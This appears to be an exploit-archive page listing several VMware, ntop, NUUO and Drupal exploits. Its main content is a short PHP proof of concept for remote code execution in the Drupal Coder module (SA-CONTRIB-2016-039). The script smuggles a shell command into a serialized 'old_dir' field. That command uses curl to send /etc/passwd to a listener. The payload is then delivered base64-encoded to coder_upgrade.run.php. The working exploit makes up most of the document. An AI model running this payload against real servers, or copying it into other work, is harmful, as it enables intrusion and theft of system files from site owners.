dac3d3dad6
2 new exploits VMWare OVF Tools - Format String (1) VMware OVF Tools - Format String (1) VMWare OVF Tools - Format String (2) VMware OVF Tools - Format String (2) VMWare - Setuid vmware-mount Unsafe popen(3) VMware - Setuid vmware-mount Unsafe popen(3) Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039) VMware Virtual Machine Communication Interface (VMCI) vmci.sys - Proof of Concept VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010) VMware - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010) ntop 2.3 <= 2.5 - Multiple Vulnerabilities ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution NUUO NVRmini 2 3.0.8 - (ShellShock) Remote Code Execution
29 lines
No EOL
944 B
PHP
Executable file
29 lines
No EOL
944 B
PHP
Executable file
<?php
|
|
|
|
# Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039)
|
|
# https://www.drupal.org/node/2765575
|
|
# by Raz0r (http://raz0r.name)
|
|
#
|
|
# E-DB Note: Source ~ https://gist.github.com/Raz0r/7b7501cb53db70e7d60819f8eb9fcef5
|
|
|
|
$cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd";
|
|
$host = "http://localhost:81/drupal-7.12/";
|
|
|
|
$a = array(
|
|
"upgrades" => array(
|
|
"coder_upgrade" => array(
|
|
"module" => "color",
|
|
"files" => array("color.module")
|
|
)
|
|
),
|
|
"extensions" => array("module"),
|
|
"items" => array (array("old_dir"=>"test; $cmd;", "new_dir"=>"test")),
|
|
"paths" => array(
|
|
"modules_base" => "../../../",
|
|
"files_base" => "../../../../sites/default/files"
|
|
)
|
|
);
|
|
$payload = serialize($a);
|
|
file_get_contents($host . "/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php?file=data://text/plain;base64," . base64_encode($payload));
|
|
|
|
?>
|